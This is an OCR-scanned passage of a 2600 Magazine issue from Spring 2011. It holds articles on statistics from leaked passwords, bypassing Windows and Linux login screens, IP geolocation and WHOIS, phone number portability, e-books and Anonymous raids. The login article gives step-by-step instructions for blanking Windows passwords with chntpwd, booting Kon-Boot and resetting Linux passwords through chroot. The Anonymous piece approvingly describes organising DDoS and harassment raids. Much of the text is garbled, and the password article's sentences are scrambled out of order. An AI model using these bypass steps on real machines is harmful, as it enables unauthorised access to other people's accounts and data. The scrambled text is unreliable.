thing. Unlike legitimate forms of social protest, such as sit-ins and civil disobedience, there is no act of courage in anonymously running a script and disrupting communications somewhere. It's simply an act of sabotage, and, in fairness, there are many who would argue that such acts are appropriate at times. Regardless, it isn't hacking, and it's

not an attempt to open dialog or get the truth out. It's the kind of tactic we should actually be fighting, where the goal is to silence people or viewpoints. After all, one doesn't counter "bad" speech by banning it, but rather by spreading more "good" speech. If the truth is indeed on our side, then getting our words out along with as many facts.as we can find ought to be sufficient. And if it isn't, then we need to try harder. But we should never become what we have been labeled as by those who fear our actions. That's a trap that's extremely difficult to escape from. We're living in a very different world today, one that even hackers and technological experts are probably quite surprised by. Revolutions being organized via Twitter and Facebook, crucial footage making its way to the rest of the world through YouTube, cell phones being as vital a tool as megaphones in reaching the masses... the technology especially snuck up on the people who supposedly were in control. Their reactions, though, were predictable and not at all unlike those of anyone who finds their little fiefdoms being challenged, whether it's an entire country, a classroom, or an office. Frequently, access to technology was either cut, restricted, or clumsily hijacked. But all that was accomplished was that more fuel was added to the fire. When someone's reaction to a conflict is to cut off communications or attempt to drown it out, they have clearly run out of things to say and have already lost the argument. We are so far quite lucky that it's individuals who have the upper hand when it comes to using technological tools and getting around the restrictions. At some point, governments are going to learn to do a far better job at controlling technology, and we must learn to recognize the warning signs. Every restriction we agree to, every extra bit of power and control we give away... it can all be turned into a weapon against free speech at some point. And like any weapon, it's not likely to go away once it's put into place. The world is a better place with more potential for positive change and the ability for justice to be served, precisely because of those with the courage to help get the truth out. For every bit of information whose revelation causes mayhem in one circle, there is another place where it's a potentially vital part of justice. The one fact we should all be able to agree upon is that the information that's out there is now reality. We should honestly try to deal with that.

Page 4

- - - - - - - - 2600 Magazine

Spring 2011

PageS

so to see more than one eight ofpasswords fall into that category was surprising. passwords containing close matches to dictionary words met my expectations. and required spending a lot of time parsing different data formats and pulling only the information I wanted from the records (username and password). I went back and started tracing statements in my code to see if I was doing something wrong.24% 9 letter passwords: 14.53% 22. the credentials aren't all from. If my undergrad statistics course taught me anything. and we have laid down specific rules about what makes a password good or bad. I won't say how I got my hands on all this beautiful data. though. but stripped of any word that was under four characters long to get a better idea of what actually is a match and what was just coincidence. While a password that is only six characters long won't stand up very long to a brute force attack. slap a few numbers at the end. with "password" being the only word that accounted for more than one percent of the entries. Also.93% 8: 25. actually.21% This statistic is surprisingly higher than I thought it would be. This is by no means fast.53% 48.52% 6 letter words: 43.-dictionary.35% 5: 5. The process to get all the data together was an arduous one. and the one that makes good passwords great. special characters) then the search space grows significantly. or a password that is the same as the username or a slight variant. so it was very important that I ensure my data set be as diverse as possible. in my opinion.36% 6.9: 10: 11: 12+: 10.16% 2. is a mix of characters.54% 10 letter passwords: 4. as a quick note.15% 2) sunshine: 0. regarding password security and how bad it is. Character Usage Special characters: Numbers: Mixed case: 47. it's not surprising in the least.. but "1 $bicycle54" would not count. The next thing I looked at was how many passwords were using dictionary words. In the end. Another common thing I saw while I was parsing all these files into a common format were dates. That means that one quarter of the time. so now let's talk about the data set I use and the methods by which I gather information. Page 6--------------------. Users might be creating passwords that are mixed case. On a similar note.92% 27. if any. really? Is there actually a pandemic of stupidity among users that needs to be addressed? Criteria Before we jump into making value-based judgments about passwords. but the places storing this information may not be storing them in mixedcase format. The data set is relatively large and contains credentials from multiple websites. while back there was a data set leaked containing millions of passwords about users from a single site.88% 3) princess: 0.27% 7: 18. and use it for their password. I suspect there is a lot of overlap in the "Special Character" and "Numbers" statistics. One thing I do wonder is if password rules on some of the sites this data is from is skewing the results a bit. both on the Internet and around the water cooler. The tools I use to analyze the data are homegrown Windows apps written in C#.87% 7 letter words: 24. Spring 2011 Page 7 .27 percent of passwords are represented.09% 6: 26.. This got me thinking. I know many non-technical people that will take a word. I also checked passwords that contained dictionary words and a modifier of at most two characters.14% 4: 3.40% 8 letter words: 18. numbers.28% Close Dictionary Matches (+Total close matches: 6 letter passwords: 7 letter passwords: 8 letter passwords: 2 characters) 12. considering some of my users. This is by no means a huge amount. a password of sufficient length. how did these passwords stand up to the mighty dictionary? Exact Dictionary Matches Total exact matches: 13..66% Methods So we're on this journey to find out how bad passwords actually are in the wild.74% 5 letter words: 13. but the space that you'd have to search for past dates is just over 700. Top 5 Dictionary Matches 1) password: 2.58% I can't believe that out of all the words in the dictionary. how bad are passwords out there in the wild. which again is a small space when compared to passwords using more characters. Regardless of length. While it's the simplest statistic.71% The "Mixed Case" statistic caught my eye because it was much lower than I expected.csv file ready for tearing apart and inspecting. or if users are picking passwords that are six to eight characters on their own. you can crack someone's password using a simple dictionary attack that only requires a couple of million attempts. One thing worth noting is that there is a great diffusion of passwords all across the dictionary. A Passwords By Length 1-3: 0. "password" is the most used for passwords still to this day. so this number can only get larger. The last statistic.000. What really blows me away is that when you combine these last two statistics. On the other hand.56% 30. using a word found in a dictionary is a huge password faux pas. but most folks are claiming that users are choosing poor passwords. things that make a password bad include using dictionary words. The same goes for numbers. The fact that nearly one half of users are using special characters is good. do people make good use of this? Recently I've heard a lot of talk. and even some with the mixed case number as well. It turns out that only 6. since it's another way to further expand the space a potential attacker has to search.2600 Magazine ---. I saw dictionaries out there that covered many more words than mine had. music sites). In addition to checking for exact dictionary matches. The first thing I looked at was the distribution of password lengths. If a password contains a broader range ofcharacters (letters. This got me wondering how many people actually used a date as their password. So. You may agree or disagree with these criteria. So the password "bicycle54" would count as a partial dictionary match. we better lay down some ground rules about what makes a password good. and a lot of conclusions about password (in) security were made.66% 5) welcome: 0. 26. The practice ofusing mixed case automatically adds another 26 potential characters to the password. none of which have much. but please feel free to use your imaginations. I was left with a huge . Actually. but it pales in comparison to a password that doesn't contain a dictionary word/variant. It turns out the number is correct and there are a few things that can account for it. So. People who follow good password practices will have at least one of each in their passwords.18% 2. and what makes it worthless. it's that the results are only as good as the data. and are largely used for CSV manipulation and basic statistical analysis. Results For the most part.89% 8. And what a wealth of information it turned out to be! This is about how I expected the passwords to be distributed. containing mixed upper and lower case. though there were a few strange statistics that made me think a bit.71% 4) shadow: 0.27% This isn't surprising in the least. user-overlap (meaning each site caters to a different crowd. Not to say that using a username and password is a bad method of securing resources. eight characters will do pretty well. and containing special characters. I used a standard English. That's one ofthe biggest things going for this experiment. dates. and should be utilized often. say. the results are about what I was expecting. it's probably one of the most important factors in determining if a password is good or bad since passwords that aren't long enough have the potential to be brute-forced in a trivial amount of time..21 percent of these passwords were dates or years. but the things that come to my mind right away are.

or run an application that is installed on the computer already? It's times like these that we may need to bypass the logging screen on an OS. The SAM file can be found under c:\windows\ system32\config\SAM.piotrbania. This will stop all the attacks I have listed above. we'll have an even better idea about the state of password affairs online. So you could use a Linux LiveCD once again to boot the machine. Final Thoughts If anyone has any input regarding the article. lleferences www. online password standards are less important than in other systems (don't get me wrong. I'd love to talk more about it. the burden falls mostly to us. I'm a code monkey myself. You are now logged in as that user. using "password" as your password is just plain idiotic). This will give you a list of all the Windows users for the system and some information about their accounts. The main problem with programs like Ophcrack is the same problem you have when trying to perform any dictionary attack. As an alternative. Since it's up to them to create the security policy. enforce these as standards and .7KB zipped up. Developers also need to be more aware of the security risks facing their systems. If you do encrypt your hard drive. too. for example) involve insecurities elsewhere in the system. You will have the options to blank their password. Boot a LiveCD containing chroot and mount the hard drive partition that contains the Linux OS that you want access to. special character.. When chntpwd asks if you would like to hive.org/wiki/Chroot en. slapper@gmai1 . So. in LiveCD format.com/a11/kon-boot/ en. anything you do in that terminal will act as though it is running on the system you have chrooted to.. Cold boot attacks also require the system to be on and logged in already to work.. The things to keep in mind here is that all these passwords are for online systems. some Linux operating systems such as Debian give you the option during the install process to encrypt the hard drive. the next time that user tries to login. and have appropriate policies in place for dealing with passwords (be it password recovery. you would have no need for either ofthese programs). This is a simple way to protect your data. We have another option in a very small bootable ISO image called Konboot. chroot allows you to change what the system sees as the root directory. and upper/ lower case character in the password. they won't be able to since their password has been changed. There is one difference at this point: You don't need a password to login. on the Internet. According to the Konboot website. this would be the SAM file. Developers are going to take the brunt of the responsibility if things are to change.. From this point on you can just follow the onscreen instructions. I believe that encrypting your hard drive is the best policy. Most distros will have chntpwd installed or in the repositories. Thanks to all the folks that make 2600 happen. "How do we protect ourselves from these types of attacks?" One way is to set a BIOS password. It's also worth mentioning that there is a version on Konboot for Linux systems.. chntpwd is a faster alternative to ERD Commander. I sat at this screen for a while before I realized I had to press the "anykey". drop me an email at sheep. not poor passwords. You could wait five minutes for it to load sometimes. but there are ways around that. but I'd say it could be worse. etc. All modem distributions of Linux have the ability to read and write to a large list of file systems including NTFS.Conclusion There are many more statistics we can pull from this data.even though they might have to drag their users kicking and screaming all the way . So. When you put this CD in a computer and boot from it. you can change or clear a user's password. once chntpwd came along I stopped using ERD Commander.. and Windows 2008. It will seem like the system is booting normally and you will end up at the login screen you are used to. Windows 7. that will try and crack a user's password. Replace usemame with the user's name that you could like to change. What if you have to make changes to the registry. a good start is to use passwords that are of sufficient length (I'd say nothing under eight characters long) and use at least one number. . Vista.org/wiki/liv~cd Thanks to Canola for all your help. It does this by running a dictionary attack on the file where passwords are stored. but users are still showing either a lack of knowledge or complete disregard for basic password policy.) in a better way..wikipedia. "kryptos Logic" with a scrolling banner below it. but less common than the other attacks. Although I'm not familiar with the process on a Windows install. This will successfully change the password. In the Windows OS. Considering this.. Things such as cold boot attacks are still possible. But. like Windows itself.wikipedia. chntpwd is a Linux utility-to reset a Windows user's password. There are programs out there. Konboot has been tested on Windows XP. The big stumbling block with both of these options is that they change or clear a user's password. It also gives you the ability to clear/blank the password on Vista systems whereas ERD commander does not work on Vista systems.2600 Magazine list you have. you will first see a boot screen that has a big logo that says. If the partition is mounted to /media/disk.. It's about 8. We've looked at a number of different ways we can bypass the local security on most systems. Nothing adds time to a brute force job faster than expanding the set ofcharacters the password can contain! None of what I just said is new or exciting. such as Ophcrack. Now. The command would be typed like this: pas swd username. com. This will save your changes. I pressed "Enter" and the system continued to boot. But keep in mind that all the big hacks in the past few months that have compromised high profile accounts (like Sarah Palin's email. Just navigate to the folder where the SAM file is located and type chn t pw -1 s am. Just choose a user and hit "Enter". too many bad password attempts. It also has the ability to edit the registry on a Windows computer. This is a good deterrent. Available either by default or through repositories. It is suggested that you blank their password rather than change it. I used to use a bootable CD called ERD Commander by Winternals. ERD Commander had a few other features too. which increases the time needed to brute force a password by many orders of magnitude. choose yes. so if some of you folks out there happen to send me more information to work with. you won't ever crack it. Changing the password doesn't always work.. You won't be able to change their password back since you don't know their password (if you did. The system is back to normal with the original passwords. Linux also gives you more control over the files on the system since it gives you access to folders on a Windows machine that you wouldn't have access to even as administrator of the Windows OS. Other ways to get through the login screen on a Linux system is with chroot.MF.passwords in general will become better. change their password. You can pop one of these CD into pretty much any computer and have full control. if you blank their password you can always set a new password once you have logged into their account on the Windows side. ERD Commander is like a Windows version of a Linux LiveCD. If the password you're trying to crack isn't in the dictionary Page 8--------------------. When you are done doing whatever it is that you need to do. but these were the only ones I really ever used. Windows Server 2003. Once downloaded. At this point. you can use the passwd command to change a user's password much like we did with chntpwd for Windows. Konboot can be downloaded in a very small zip file. Now you can type chntpwd -u username sam to edit a user's account (replace username with the user's name). There are a variety of Linux distros available. It would boot and ask where Windows was installed and then I could edit the registry or use a program called Locksmith that allows you to change a user's password. Upgrading or downgrading a user's account will give or take permissions from the user. how bad is the state ofonline password security these days? That'll still depend on who you ask. And the information in the article can only be as good as the data behind it. how can people make their passwords more secure? Well. and colonelxc! H by MetalxlOOO http://FilmsByKris. And I'm not trying to pass the blame or anything. and as painful as it is to admit. but I think I've covered all the big ones. or upgrade their account. Type the new password and confirm it by typing it a second time.. then open a terminal screen and run chroot /media/disk. The problem arises when you may need more than just files access on the computer. The thing that drove me crazy about ERD Commander was that it was. very slow. just restart the computer without the CD in the drive. Spring 2011 Page 9 .org/wiki/Winterna1s en. So. be sure to remember your password or you're screwed.wikipedia. Getting someone's password can be a difficult thing to accomplish. The question arises. you guys/gals rock! And a very special big ups" to C. So.com It doesn't take much to sit down at a computer and bypass pretty much any security that may be set up for the local accounts. unzip the ISO file and burn it to a CD using your favorite CD burning program.

I'd . The ISP will assign. perhaps self-disclosed information. MA C address.htrn http://ip~nfodb. WHOIS services are typically communicated using the Transmission Control Protocol (TCP). cr2.COM # This information in WHOIS for geospoof.com/index..arin.i ..6 2.46 Hostnarne vl600.COM Address: 69. " '.72.92.17. embeddedsoftware number (such as UUID.org [snip] Tech ID:tultDEX6uQuRBJgV Tech Name:Hollie Dewers Tech Organization:Dogs R Us Tech Street1:101 Bow Wow Way Tech Street2: Tech Street3: Tech City:Pittsburgh Tech State/Province:Pennsylvania Tech Postal Code:15218 Tech Country:US Tech Phone:+412. er1. Wi-Fi connection location. Now look at a traceroute from New York to 66..92.163.234 shown below: Hop TCP UDP ICMP Real Time time 2 1. +.72. However.com/ipLocator. but many simplified web-based tools exist. The WHOIS system originated as a methodfor system administrators to obtain contact informationfor IP address assignments or domain name administrators. The location ofthe web server shown below will be attempted without the use of geolocators: http://geospoof.234. RFID.Z0NEEDIT.topwebhosts. wdc 1.org several times: # nslookup > server NS2..234 Speakeasy.COM Name Server:NS4. Use one of those name servers and lookup geospoof. VA whatismyipaddress Rockville. IP address geolocation data can include informatid such as country.117 .P a g e 11 . 7 1.o.. net ge. or an autonomous system number..0 . 4 3 1.: Tech FAX: Tech FAX Ext. " It is important to note that geolocators do not rely on WHOIS information for a domain name.234 First.8 7.org Name: 216.. ge-0-2 -0. Now let's look at how well geolocation does with locating a web server.87.Z0NEEDIT.92. longitude.163.org/tools/ip-locator.250 Address: ~ Page 10 2600 Magazine Spring 2011 .160.com Name Server:NS2. (The traceroute was performed with the WorldIP Firefox plugin.8 +6. or other. an IP address block. mobile device. SPEAKEASY-5 (NET-66-92-0-0-1) 66.2 2.226#53 Address: geospoof.163..92.Z0NEEDIT. ge-3 -0. an IP address to the subscriber. 4 +1..92. speakeasy. . website visitor or other. speakeasy.163.158. nyc01.Z0NEEDIT.com/ All four geolocators were requested to provide the location of 66.93. Servers listen to requests on the well-known port number 43.1 . Geolocation usually works by automatically looking up an IP address on a WHOIS service and retrieving the registrant sphysical address.0 . wdcl.83. Virginia.8 7. " The availability of a MAC address for a geolocation service (geolocator) to use seems dubious and Wikipedia fails to mention the traceroute utility. 202 .php "~~ t«f1 ide~tification.1 1. and timezone.3 9.' ''' ''i$'i.255 WDC BRIDGED CIRCUITS SPEK-WDC-BR-19 (NET-66-92-163-1-1) 66. DC ipinfodb Silver Spring. the Linux whois command line tool will be used to query the WHOIS database: # whois 66. 5 1.. city. they can use information from WHOIS for an IP address assigned to a domain name. but the hostnames in hops 4 and 5 indicate that the target IP is located in the WDC area.~ } q·~~~. Exif/IPTC/XMP or modern steganography).163. " Wikipedia also describes how geolocation works: "Geolocation can be performed by associating a geographic location with the Internet Protocol (IP) address.0.org Here is a fragment of the WHOIS record for geospoof.Z0NEEDIT. A commercial concern that targets specific regions with local advertising would think that geolocation works very well. latitude.geobytes. 1 7 198.:.32.66. invoice. <.. a key component of geolocation is the WHOIS service.....COM Server: 69.234 and here are the results: geobytes Washington. Consider the following static IP address assigned by Speakeasy for use in Arlington..org is bogus except for the name servers. Wi-Fi connection locations and GPS coordinates are likely being utilized by some geolocators.. net 220. These four free geolocators were easily found with Google and they all allow unlimited lookups: http://www. # # ARIN WHOIS data and services are subject to the Terms of Use # available at https://www. and network administrators predominantly still use this method. nyc l .255. but at present. Wikipedia has this to say about WHOIS: HWHOIS (pronounced as the phrase who is) is a query/response protocol that is widely used for querying databases in order to determine the registrant or assignee of Internet resources.. hardware embedded article/production number. cr2 ..119 69.9 7.org: # whois geospoof.i'. The typical Internet home user will subscribe to Internet access from an Internet Service Provider (ISP). MD That is not exactly pinpoint accuracy for an IP address in Arlington..IQcafiijn is " il""". The home user has no control over the information contained in the WHOIS database for their IP address. last updated 2010-04-21 20:00 # Enter? for additional hints on searching ARIN's WHOIS database. Inc.2 5 9.66.7 9.org NS2.158.92.255 # ARIN WHOIS database.php http://whatisrnyipaddress. postal/zip code.3718139 Tech Phone Ext. net AS 32748 13538 23504 23504 AS name STEADFAST TELEHOUSE SPEAKEASY SPEAKEASY The traceroute was blocked and was unable to reach its final destination. corel.. steadfast.226#53 > geospoof.6 +0..0 .98. region..22 69.: Tech Email:holliedewers@aol. VA: 66.) Now let's see what geolocators have to say about 66.2 4 7. MD topwebhosts Ashburn...2 +1. is~~! computer. but all locations are probably within 20 miles of Arlington. speakeasy. such as a domain name.2 9.2 .htrnl # http://www. DC) keyword seems to be a big clue. geographic-location of an Intemet-connecl~1 ~::~'lij~t. net nyiix. . or device GPS coordinates. 4 1.92. either statically or dynamically.163.92.The WDC (Washington.~C "" rea/-world i. WHOIS lookups were traditionally performed with a command line interface application.COM Default server: NS2.4 6 7 8 Destination unreachable IP 67.: ofi"l i"the.141.163..net/whois_tou.17. Let's see what can be discovered about a specific IP address without using geolocators.

142.org Address: 69. you have plenty of choices for home telephone service. the long distance carrier looks up the Common Language Location Identifier (CLLI) for the switch serving the number you call and the tandem serving that switch. China Mobile. Many will only do lookups on IP addresses. Construction of the new Beijing Central Office is nearly complete. Skype is popular (but illegal in China).142.org Server: NS2. and doesn't have an ownership stake in any phone companies. The 69.98. Of course.org is in Seattle..98) and that the name server NS2. Inc. The solution may be to find a proxy that geolocation says is in Los Angeles and not be concerned with where it really is located. The web page for geospoof. Their services also include web forwarding with a cloaking option.250 OrgName: CariNet. in many cases finding the real location of a proxy web server is not necessary in order to bypass restrictions. What a contrast to the United States! Since 1997.98 address appears to be in Clifton. They provide free services for up to five domains.org Address: 69. org is currently in dispute. NJ: # whois 69. Prior to local number portability. known as POTS.S.226#53 Name: geospoof. depending on what part of the country you are in. Boost Mobile.158. they provide the primary and secondary DNS name servers for geospoof.72.org is in San Diego. telephone companies almost exclusively used a Telcordia publication called the Local Exchange Routing Guide (LERG)to determine how to route calls.98.98. you've had a choice of multiple local phone companies. or China Telecom).org Address: 216. but you're unable to take your number with you if you switch carriers. And the system more or less works quickly and seamlessly today.141. Washington.250 and 69.org can be easily moved around the world and geolocators cannot find it.250 > Notice that geospoof. More specifically. we expect it to happen eventually. the carrier would first reference the LERG. Meanwhile. there aren't a bevy of options in China for your home phone. com if the domain does not seem to be related to the article. For example.Name: geospoof. There is still plenty of work to do in Beijing. A correct domain will be provided.COM does not always return the two addresses in the same order.142.72. NeuStar isn't a phone company. Traditional phone lines. IPInfoDB will look up either a domain name or IP address: http://ipinfodb.98.141. If you move.141. or NPAC.Z0NEEDIT. which would then deliver the CLLI of Page 12 2600 Magazine Spring 2011 Page 13 . Americans take for granted the ability to keep their phone number when they switch from a fixed line to wireless phone. Based on the NPA-NXX of a called number.com/index. While there are typically not more than three broadband choices (typically one cable provider.72.Z0NEEDIT. any organization can hide the real location of a server with a private network that connects to the Internet in some distant location. or move from one wireless provider to another.98 Name: geospoof. Hello.us top level domain and runs an Internet DNS root server among other critical infrastructure roles).142.php Do a lookup of geospoof. and greetings from the Central Office! I'm winging my way across the Sea of Japan on my way back to Seattle. Local number portability is part of our operation plan.org resolves to two different IP addresses (216. but makes most of its money from phone companies (it also administers the . At the time of the writing of this article. and VolP services have not caught on the way they have in North America.org is in Clifton. there is only fixed line service from China Telecom or China Unicom.org is provided by zoneedit. when Local Number Portability (LNP) was first introduced. there are four major nationwide wireless mobile phone companies (and a couple of dozen smaller local and regional providers) with a seemingly infinite number of resellers and Mobile Virtual Network Operators (such as Tracfone. Using geolocation to find the geographical location of a web server does not work very well.org is on two networks and the primary name server for geospoof. Even though there is no local number portability available in China yet. From the list of geolocators above.98 > geospoof. Unlike in the U. NPAC is a carrier-neutral one-stop shop for number portability. We're building the new Central Office to be ready to implement it. and you don't even have a choice of long distance provider (although there are dozens of dial-around services providing competitive long distance rates). CA. if you make a call to (206) 386-4656. and I will continue to be based there for some time. Geolocators do not follow web forwards.72. the FCC-appointed administrator of the North American Numbering Plan (NANP). and a wireless service provider) in major American cities.org. The domain or zone management for geospoof. You do have a choice between three mobile telephone providers (China Unicom. Run by NeuStar. The ownership of domain geospoof. The cloaking option means that the real URL of the web server will not be displayed in the navigation bar. are a rapidly diminishing share ofthe market. VolP service from the local cable provider has half (or more) of the residential fixed line market in some cities. So the geolocators are confused because geospoof. the web server for geospoof.141. and Straight Talk). And there is certainly no concept of wireline to wireless portability. This is used to route your call. OrgID: CARIN-6 Address: 8929 COMPLEX DR City: SAN DIEGO StateProv: CA PostalCode: 92123 Country: US [snip] Not all geolocators will do lookups on domain names.72.com.142. For example.org alternates its answer between the two IP addresses. one traditional local phone company. someone in New York might have a need to post an ad on Craigslist in Los Angeles and geolocation restrictions are preventing this from happening.250 address seems to be in San Diego. your phone number will change.org on IPInfoDB and sometimes it will say that geospoof. NJ and other times it will say that geospoof.98 OrgName: FortressITX OrgID: FORTR-5 Address: 100 Delawanna Ave City: Clifton StateProv: NJ PostalCode: 07014 Country: US [snip] And the 216. and it's time for a trip to headquarters to discuss the details of our operation plqn.72. The central nexus ofthe number portability system is the Number Portability Administration Center. Please contact the author at geospoof@gmail. However.COM Address: 69. CA: # whois 216. although this is a compet- itive market with numerous companies who can sell you a local dial tone (although this is often actually provided by your local phone company under a reseller arrangement). isn't owned by any phone companies.

yes. A database "dip" is generally performed on the switch using the IN or AIN SS7 triggers. References • http://www.love the (cactus?) new book! (Cactus?) • Penguin Project .com/ -News%20and%20Events/20091 -Number_Portabili ty_Astricon . Nintendo. there is no need to dip 300 times a minute to find out whether the local Top 40 station's phone number has ported in the middle of an on-air promotion). very long time ago. re c rea lor e . do we complete the call? Enter NPAC. How.this one I can't say much about since it's very true. six points are discussed regarding e-books: 1. PC-XT. so we take measures to minimize these costs. Not For Sale. Local carriers have to pay too. and I really never saw those books again. routes are selected based on the serving OCN. through a tandem in the wrong city. I read and. There are other points of view that are of some importance that could be argued with the same intensity. Again. the NPAC database maintains the associated LRN. and not to accumulate dust in your attic. but the point is you will need a couple ofdays to acquire that knowledge and a few day to come back to it (if it's a technical book. companies might create ways of doing so. and more fun. Once you are done. With electronic media. a Verizon (ex-GTE) tandem. which are called "dip fees. Mega Drive. which creates another problem. No used bookstore. if necessary. For every telephone number In the North American Numbering Plan. then. It's somewhere in a box. and other cool things. But OK. The call will still go through (because even though Qwest is not required by FCC rules to forward incorrectly routed calls to ported numbers. they generally provide this service). at least you have a chance Page 14 2600 Magazine Spring 2011 PagelS . it would be awesome to be able to loan e-books. and the local exchange carrier (Qwest in this case) would route the call to the end office. LNP 'T' rrifi d c. I don't regret it. In the VoIP wholesale world. and there are great chances that you will never see it again. oc .very detail ed NplAC d ocument on co nfizuri etai fi gunng lati c. The OCN (Operating Carrier Number) has also changed. Predictably. access charges are paid to the carrier that delivers the call.. I recycle the books. or they will. All of this means we now need more data to route the call. a brand new ~ 2. the CLLI of the end office is now STTNWAHODSO. Format decay (meaning your collection will be left behind).the tandem (SITLWA06C9T) and the end office (STTLWA06DS6).. reread. and a whole bunch of old stuff. it's time for me to settle in for the long flight ahead.com . we're going to deliver the call to the wrong switch. maybe you should not be reading that. if we go with the flow. there is little or no possibility of loaning. Now suppose the Seattle Public Library (used in the above example) changes their local service' provider to Level 3. or read about PHP? Probably they could offer you a new Playboy or a new PHP book. That made me think a little bit. which is not that bad because you actually read the first one. technically inclined. base. and there is a good chance that you will read the other ones if you knew about them without having to search." After all. so in many cases you don't even get to know about it. cooler. Do we really need 1000 copies to keep history? What if everyone took their books and donated them to local libraries. our Revenue Assurance department doesn't like that either. if you take into consideration what my father told me more then once when I was little: "Son. If we only use the information the LERG gives us.2 0 0 9 . In addition to charging a monthly subscription fee for access to the database.npac. No anonymity. they charge a few ten-thousandths of a cent per dip. well. with the incorrect LRN. This refers to the fact that because of the technology that applies to the e-books and devices. so every single one of them would have at least one copy of each book ever printed? The rest of it would be reused for something else. I have that book. Enjoy your spring.. 5. If that book get old.Successful hacker trip to Antarctica. So the hardware lock-in doesn't really bother me." Wise words. as technology and information changes. for example). movies. Then I recycle. Well. earners. th trans ations lor . NeuStar operates the NPAC data. The real question is why do we always want to keep old news. • http://www. "Oh yes. through digital libraries or something like that. The difficulty ofloaning books to yourfriends.transnexus. in my attic. That will happen before the book is printed. it's fine . 6. Now let's just say that I understand and even agree with what was said. and also the correct OCN for routing and billing. drop it off with the appropriate routing data at the tandem. we don't perform dips on our own subscribers' numbers and we cache dips for frequently dialed numbers for a few hours (after all. you should never loan books. Xbox360. PS3. This creates a couple of problems.. it's not only long distance carriers that get slammed with NPAC dip fees. If you put enough pressure on them.Bell System Property. The issue here is the need for ownership and the ability to manipulate the media as you wish. NeuStar doesn't supply this information for free. Now let's think about that a little. 4. i7. It's now EVRTWAXA03T. Although the telephone number remains (206) 386-4656. No anonymity. The long distance carrier would select a route to deliver the call. Of course. I gave up my VHS a very. If you are worried about people knowing what you are reading. No used bookstore. you are done. Now. A local routing number has also been assigned. b h .. Master System. 1 d wi li ihty services to ot WIre ess an WIre me . 3. Along with providing number portabili .npac. The di/ficulty of loaning books to your friends. version would be better than the old dusty one. a local CLEC.p s. t d vz sw es c r i. I doubt that you will ever come back to it and read it again if it is a technical book. N64. I'm both incredibly jealous and incredibly happy! • Telephreak . I also gave away my Atari. but Qwest doesn't do anything for free and the Revenue Assurance department is rarely amused by expensive transgressions in translations. store old stories.Excellent PowerPoint presentation which describes LNP considerations for VolP carriers. You will forget about it. This can really add up over millions of telephone calls a day.National Portability Administration Center • http://www. pp t . They're probably in some dump site somewhere and the only thing touching those cool pages are flies and worms. because. or anything like that to anyone. To avoid unnecessary charges. So why would I want to keep around the old stuff? There are museums to remind me of how much fun I had with those. why would you care if you have the device and you read the book? Why would you like to keep it? Do you keep every newspaper and magazine that gets delivered to your house? I don't. which isn't even in Seattle. What can they do if they know that you saw the latest Playboy magazine. and don't call anywhere I wouldn't! Why I Like E-b()()k~ by Oakcool Dragom had a very interesting "Transmissions" column in 27:1 about why he likes printed books. Remote and invisible censorship. and the tandem has changed too. They are way better. And with that.com/regions/ -s 0 u t h we s t / s wdo c s / t e xa s / _ T tS . Remote and invisible censorship. which is how long distance calls are increasingly handled. You can obviously say that there are exceptions to that. Now I have Blu-ray." History. because locally dialed phone numbers (especially wireless phone numbers) may have been ported. so I won't keep it around for long. so here I will try. Hardware lock-in. This can be used to determine a telephone number's true CLLI and end office. and when a number is ported it's necessary to track this accurately. In the article. First of all. Hardware lock-in. Shout outs to: • RBCP . the local routing number is now in the (206) 569 NPA-NXX. 50" HDTV. Format decay (meaningyour collection will be left behind). and use bunches and bunches of boxes and space? Just to say. since more than once it happened to me. You buy a book or any other media with the primary intent of getting the knowledge inside it or just to listen to it.

:' by Lifeguard I believe a person is only a hacker if another hacker calls them one.25" floppy disks were double sided. About a year later the movie War Games came out and suddenly all the older kids wanted to be hackers.. Perhaps a better definition is a person who manipulates a system in ways other than were intended by the system designers and operators. Fear of cyber jihad helps sell click ads..:~"'::~:~:::::::::-:':::X~~:::-:~:. • Your cost is usually lower. CSIS.. is Anon: Carders and crackers/ hackers who leak exploits or various tools to middlemen who put it together for anybody to use. I got an Apple ][+ and fell in love with it. T . It really doesn't matter where and how you got it. but not a good idea from my parents' second phone line in our home office. so you'll remember how dangerous uncontrolled communications are when it comes time to vote on whatever new law they are trying to push through Congress. they use you as an example. or have a creative prank.000 people on 4chan alone to join in the attack guaranteeing final victory (epic troool. Your attic will be much more spacious and happy. I hope it is at least entertaining. It was cool to be a phone phreak. • For now you can't trade and loan. That. The rigid corporate structures of our governments. but unmodified would only work with one side up. That Christmas. You don't have to remember that you lent that book to Joe. I also learned to trade information and. It can't be measured quantitatively or even projected with a long term statistical forecast. I learned to do things like dial into the local library for their card catalog. Their combined efforts can source around 60. everyone had an IP address that could be tracked. No extra effort is needed. Sometimes anonymous attacks happen totally at random. and wrestle a guilty plea out of you. and notched the disks so we could write to both sides. If this is not informative. but there is definitely an overlap of skills. but I will let you figure them out. which is a fanatical desire for a stable managerial. and fits perfectly with the FBI narrative of crushing all our freedoms to prevent the e-apocalypse. Fifteen years later. The first hack I learned was that the 360k 5. and now you are free to learn more. Anonymous is e-Qaeda if you watch CNN or even the BBC. you'd think total cyber war was upon us. Advantages to E-books • The fact that e-books are electronic. Why so much press over minor DDoS attacks and general miscreants? Because every corporate media outlet loves Anonymous. In Ultima for example. /i/nvasion. then the media trolling begins.. and other huge messes of non-conforming Facebook or Twitter communities and spread the word that an epic raid is about to go down. Don't live in the United States? Don't worry . simply spam enough forums and image boards with your idea and. hit points. flipped a second disk over as a template. ··:·. plus you can get whatever else that you don't have on demand is a big advantage. You'd be surprised what the media will print! run after a raid goes down. Anonymous has absolutely no hierarchy.·. the highest form is "for the fun of it. I once saw Fox News broadcast a guy claiming it was an organized group of people with AIDS against condoms. So we took a hole-punch. then flood everywhere with an ad calling for volunteers to help them in global e-jihad.. The goal is to create anarchy and reinforce the reality that the Internet should (and can't) be government or corporate controlled through unprecedented massive semiorganized trolling.. As Linus wrote. you can fit them in a small convenient device. military. the Internet was up and running. you might make a copy of the information before it degrades.P a g e 17 . and ensures future raids since so much mainstream attention is received. $cientology.. somewhere. Blackhat hackers who make their living basically being blackhat. and if you are savvy enough. I also learned to use the ''find'' command in shared hosting accounts to find mp3 and movie files of other users. In real life. I got a modem and started calling BBSes. This is how an epic Anonymous raid typically happens. no "leaders.. Interpol. Shared knowledge amplified intelligence. Everybody is encouraged to contact the media and declare the latest raid for whatever ridiculous political or troll reasons..:. The real phreaks were brute forcing long distance calling codes and 800 numbers. To them.~ . This is why the full force of the law is dispatched after every anonymous prank.. Don't be an example if you're going to do this. Not just ten minutes later. as long as I did not take credit as being the originator. we could increase our character's strength. Hackers are motivated by fun or the rush of learning something new and forbidden. or raiding epileptic forums with flashing images. I am going to 